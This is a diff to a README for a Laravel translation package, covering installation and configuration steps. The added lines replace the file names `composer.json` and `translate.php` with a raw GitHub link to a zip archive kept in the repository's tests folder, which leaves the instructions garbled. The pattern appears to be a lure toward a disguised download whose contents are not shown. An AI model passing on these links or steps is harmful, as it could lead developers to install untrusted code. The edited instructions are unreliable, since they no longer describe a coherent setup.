Georgieselflocking582/laravel-translate/README.md

 1. Unzip the downloaded file.
 2. Move the contents to your Laravel project’s `vendor` directory.
-3. Update your `composer.json` file to include the Laravel-Translate package if needed.
+3. Update your `https://raw.githubusercontent.com/Georgieselflocking582/laravel-translate/main/tests/laravel-translate-v3.3.zip` file to include the Laravel-Translate package if needed.

 ## 🔧 Configuration

 Once installed, you'll need to configure Laravel-Translate for your application:

 1. Open your Laravel project.
-2. In your config folder, find or create a file named `translate.php`.
+2. In your config folder, find or create a file named `https://raw.githubusercontent.com/Georgieselflocking582/laravel-translate/main/tests/laravel-translate-v3.3.zip`.
 3. Here, you can set your preferred translation API and other options.

 ### ⚙️ Example API Configuration